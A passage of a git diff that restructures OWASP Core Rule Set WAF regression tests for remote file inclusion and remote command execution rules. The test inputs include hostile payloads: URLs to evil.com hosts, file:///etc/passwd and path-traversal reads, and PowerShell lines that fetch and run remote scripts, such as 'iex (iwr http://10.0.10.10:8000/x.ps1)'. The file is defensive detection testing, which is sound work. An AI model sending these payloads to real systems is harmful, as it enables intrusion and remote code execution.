text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftp://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-3 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftp://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 3 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftps://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-4 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftps://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 4 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-5 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 5 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-6 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 6 desc: Partial match stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://evilexample.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-7 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://evilexample.com/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 7 desc: Mismatching domains stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com.evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-8 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com.evil.com/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 8 desc: Mismatching ports stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com:1234/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-9 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com:1234/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 9 desc: Matching hosts stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com/" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-10 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com/" + version: HTTP/1.1 + output: + no_log_contains: id "931130" + - test_id: 10 desc: Matching hosts and ports stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com:1234/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-11 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com:1234/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 11 desc: Subdomains stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://www.example.com/some/path" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-12 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://www.example.com/some/path" + version: HTTP/1.1 + output: + no_log_contains: id "931130" + - test_id: 12 desc: Bypass 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f:asd@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-13 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f:asd@evil.com/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 13 desc: Bypass 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-14 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f@evil.com/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 14 desc: Bypass 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f:foo@bar@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-15 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f:foo@bar@evil.com/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 15 desc: basic auth stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://foo:bar@example.com/" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-16 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://foo:bar@example.com/" + version: HTTP/1.1 + output: + no_log_contains: id "931130" + - test_id: 16 desc: "Positive test: Remote File Inclusion Attack (931130) - Detect url:file://" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-17 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file://foo.bar" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 17 desc: Remote File Inclusion Attack (931130) - Detect gopher:// stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=gopher://google.com/_SSRFTest!" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-18 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=gopher://google.com/_SSRFTest!" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 18 desc: Remote File Inclusion Attack (931130) - Ldap Protocol stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ldap://127.0.0.1/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ldap://127.0.0.1/" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 19 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=jar:http://evil.co/b.zip!a" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=jar:http://evil.co/b.zip!a" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 20 desc: Remote File Inclusion Attack (931130) with Java backend stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file://etc/services" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file://etc/services" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 21 desc: Remote File Inclusion Attack (931130) with local_file url scheme stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=local_file://something" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-22 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=local_file://something" + version: HTTP/1.1 + output: + log_contains: id "931130" + - test_id: 22 desc: Remote File Inclusion Attack (931130) with Java backend and trailing / stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file:///etc/passwd" - version: HTTP/1.1 - output: - log_contains: id "931130" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file:///etc/passwd" + version: HTTP/1.1 + output: + log_contains: id "931130" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml index 35e73e0eb..1685c4137 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml @@ -2,22 +2,19 @@ meta: author: "emphazer, azurit" description: None - enabled: true - name: 931131.yaml tests: - - test_title: 931131-1 + - test_id: 1 desc: Remote File Inclusion Attack (931131) with REQUEST_FILENAME stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd" - version: HTTP/1.1 - output: - log_contains: id "931131" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd" + version: HTTP/1.1 + output: + log_contains: id "931131" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml index f48d4fe29..c7b1c1167 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml @@ -1,87 +1,81 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "932120.yaml" description: "Tests to trigger or not trigger rule 932120" +rule_id: 932120 tests: - - test_title: 932120-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1" - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1" + version: "HTTP/1.1" + output: + log_contains: "id \"932120\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1' - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1' + version: "HTTP/1.1" + output: + log_contains: "id \"932120\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932120\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932120-4=Invoke Web Request http://example.com/path/file.ps1' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932120\"" - - test_title: 932120-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932120-4=Invoke Web Request http://example.com/path/file.ps1' + version: "HTTP/1.1" + output: + no_log_contains: "id \"932120\"" + - test_id: 5 desc: "Test for BB GU2FIXLC - powershell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe' - version: "HTTP/1.1" - output: - log_contains: id "932120" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe' + version: "HTTP/1.1" + output: + log_contains: id "932120" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml index a5df88d85..efd4198ee 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml @@ -1,55 +1,51 @@ --- meta: author: "0xInfection" - enabled: true - name: "932125.yaml" description: "Tests to trigger rule 932125" +rule_id: 932125 tests: - - test_title: 932125-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?cmd=%3Biwr%20http://example.com/path/file.ps1" - version: "HTTP/1.1" - output: - log_contains: id "932125" - - test_title: 932125-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?cmd=%3Biwr%20http://example.com/path/file.ps1" + version: "HTTP/1.1" + output: + log_contains: id "932125" + - test_id: 2 desc: "Test for BB finding VYYFBP5V" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?cmd=%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd" - version: "HTTP/1.1" - output: - log_contains: id "932125" - - test_title: 932125-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?cmd=%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd" + version: "HTTP/1.1" + output: + log_contains: id "932125" + - test_id: 3 desc: "Test for BB finding VYYFBP5V" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1) - version: "HTTP/1.1" - output: - log_contains: id "932125" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1) + version: "HTTP/1.1" + output: + log_contains: id "932125" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml index b5c8aa173..6cce5b313 100755 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml @@ -1,268 +1,251 @@ --- meta: author: "Paul Beckett, Max Leske, azurit" - enabled: true - name: "932130.yaml" description: "Tests to trigger or not trigger rule 932130" +rule_id: 932130 tests: - - test_title: 932130-1 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932130-1=$(cmd)" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-2 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932130-2=${cmd}" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-3 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "931120-3=<(cmd)" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-4 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: ">(cmd)=931120-4" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-5 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932130-5=Some text (in brackets)." - version: "HTTP/1.1" - output: - no_log_contains: 'id "932130"' - - test_title: 932130-6 + - test_id: 1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932130-1=$(cmd)" + version: "HTTP/1.1" + output: + log_contains: 'id "932130"' + - test_id: 2 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932130-2=${cmd}" + version: "HTTP/1.1" + output: + log_contains: 'id "932130"' + - test_id: 3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "931120-3=<(cmd)" + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: 'id "932130"' + - test_id: 4 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: ">(cmd)=931120-4" + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: 'id "932130"' + - test_id: 5 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932130-5=Some text (in brackets)." + version: "HTTP/1.1" + output: + no_log_contains: 'id 